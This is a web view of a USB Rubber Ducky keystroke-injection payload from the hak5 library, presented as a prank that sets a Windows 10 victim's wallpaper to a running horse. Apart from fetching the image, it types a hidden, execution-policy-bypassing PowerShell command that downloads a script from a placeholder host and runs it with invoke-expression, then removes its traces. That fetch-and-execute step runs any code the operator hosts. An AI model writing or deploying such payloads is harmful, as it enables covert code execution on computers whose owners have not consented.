Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/Horsd/payload.txt
2968 views
1
REM Title: Horsd
2
REM Author: MocconaCoffee
3
REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.
4
REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
5
REM Target OS: Windows 10
6
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
7
DEFINE #SCRIPTURL example.com
8
9
DELAY 3000
10
GUI r
11
DELAY 300
12
STRING powershell
13
ENTER
14
DELAY 300
15
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
16
ENTER
17
DELAY 100
18
STRING exit
19
ENTER
20
DELAY 1000
21
GUI r
22
DELAY 300
23
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #SCRIPTURL/horsd.ps1?dl=1; invoke-expression $pl
24
ENTER
25
DELAY 1000
26
GUI r
27
DELAY 300
28
STRING powershell
29
ENTER
30
DELAY 300
31
STRING Remove-Item horse.jpg
32
ENTER
33
DELAY 300
34
STRING exit
35
ENTER
36
37